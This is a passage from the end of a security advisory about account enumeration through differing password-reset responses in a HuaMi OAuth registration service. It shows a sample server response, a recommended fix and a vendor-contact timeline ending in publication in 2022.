Build/QKQ1.190716.003)<br />Accept-Encoding: gzip, deflate<br />Content-Length: 0<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />The server response to an invalid email address:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />HTTP/2 404 Not Found<br />Date: Mon, 30 Aug 2021 12:40:08 GMT<br />Content-Type: application/json<br />Content-Length: 39<br />Vary: Origin<br />Vary: Access-Control-Request-Method<br />Vary: Access-Control-Request-Headers<br /><br />"HuaMi Oauth / User Registration 2.0.2"<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br /><br />Solution / Workaround<br />#####################<br /><br />Ensure the application returns a consistent message for both existent and<br />non-existent accounts during the password reset process.<br /><br /><br />History<br />#######<br /><br />2021-08-30: Vulnerability found & advisory created<br />2021-09-24: Vendor contacted<br />2021-10-25: Vendor contacted again<br />2021-11-18: Vendor contacted again<br />2022-04-27: No reaction from vendor, advisory published<br /></code></pre>